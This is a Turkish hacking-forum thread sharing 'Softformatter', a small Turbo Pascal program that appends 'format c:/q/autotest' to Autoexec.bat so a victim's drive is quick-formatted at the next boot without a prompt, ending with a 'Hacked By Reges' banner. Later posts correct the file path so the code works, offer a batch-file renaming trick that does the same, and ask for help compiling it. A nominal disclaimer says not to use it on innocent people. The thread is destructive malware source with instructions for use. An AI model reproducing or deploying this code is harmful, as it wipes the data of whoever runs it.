Softformatter V1.0

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Reges
    Reges's avatar
    Erkek
    {--Bu Program Reges Tarafından Hazırlanmıştır.Kendi sisteminizde Çalıştırdığınızda meydana gelecek hasarlardan ben ve Tahribat.Com Yetkilileri Sorumlu Değildir--}

Uses crt;
    var
    dosya:text;
    hack:string;
    begin
    hack:="format c:/q/autotest";
    assign(dosya);
    writeln(dosya,hack);
    gotoxy(15,15);textcolor(red+blink);
    write("Hacked By Reges");
    close(dosya);
    End.

Program komutları anlaşılır ve basittir.Turbo Pascal 7.0 kullanılarak hazırladığım bu programın çalışma prensibi şudur;
    Windows açılırken okudugu Autoexec.bat dosyasının altına format ve parametrelerini yerleştirerek windowsun bir dahaki açılışında kullanıcıya sormadan QuickFormat yapmasını sağlıyor.(Siz kendi makinanızda deniyorsanız Bence Autoexec.bat Dosyanızı Yedeklemenizi tavsiye ederim).
    Ayrıca Runtime veya Division By zero ile karsılasmamanız için bir patch kullanınız.

Dikkat:!!! Bu kaynak kodaları sizleri bilgilendirmek amacıyla verilmiştir.Lütfen masum insanların,internet cafelerin bilgisayarlarında denemeyiniz..Programın Tum kodları akış diyagramı fikri kendi eserimdir.Lütfen kaynak göstermeden kullanmayınız.

- Bilginin Adresinden TurkCom.Org -
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Tarikat Şeyhi
    HolyOne
    HolyOne's avatar
    Erkek
    autoexec.bat dosyasina yazilacagini girmemişin proramda autoexec.bat gecmio hoja, bide winME, 2000,XP de calismaz bu bilesin

Nush ile uslanmayanı etmeli tekdir, Tekdir ile uslanmayanın hakkı kötektir!
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek
    abi senin bu dediğin ms dos 5.0 ve batch file zamanından beri vardı ayrıca turbo pascal filan katmana gerek yok bi txt hazırla ismini autoexec.bao filan koy autoexec ede
    ren autoexec.bat aaa.dfs
    ren autoexec.bao autoexec.bat
    yaz o gelecek sefere dosyanın ismini degiştirecek ve bir dahaki açılışta fornmata başlayacaktır bu kadar basit :::::::::))))))))))))))

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Reges
    Reges's avatar
    Erkek
    Dosya Açılışında

assign(dosya,'c:\Autoexec.bat');

olacak özür.Ayrıca o işlemlei yapana kadar bu oluşan dosyaya tıklamak yeterli.Turbo PAscalda bu kadar oluor..

- Bilginin Adresinden TurkCom.Org -
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    zemin
    zemin's avatar
    Erkek
    şunu tam açıklarmısınız baba düzeltim tam olarak verdiğin kod çalışmıyor uses crt ekleyince delphi7de hata veriyor tam olarak kolay şeklide açıklarsanız sevinirim
Toplam Hit: 2167 Toplam Mesaj: 5